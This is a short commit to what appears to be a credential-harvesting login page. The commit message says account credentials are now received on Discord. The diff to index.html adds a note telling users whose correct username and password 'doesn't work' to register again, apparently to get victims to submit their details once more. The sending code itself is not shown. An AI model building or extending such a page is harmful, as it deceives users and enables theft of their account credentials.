added receiving account credentials on discord

--- a/index.html
+++ b/index.html
@@ -12,6 +12,7 @@
         <input id="password-input" type="password" placeholder="Enter your Password" />
         <button id="submit-btn">Log In</button>
         <p>Don't have an account? <a href="register.html">Register</a></p>
+        <p class="note">Note: if you're entering right username and password but it doesn't work register again.</p>
     </div>
     <script src="app.js"></script>
 </body>
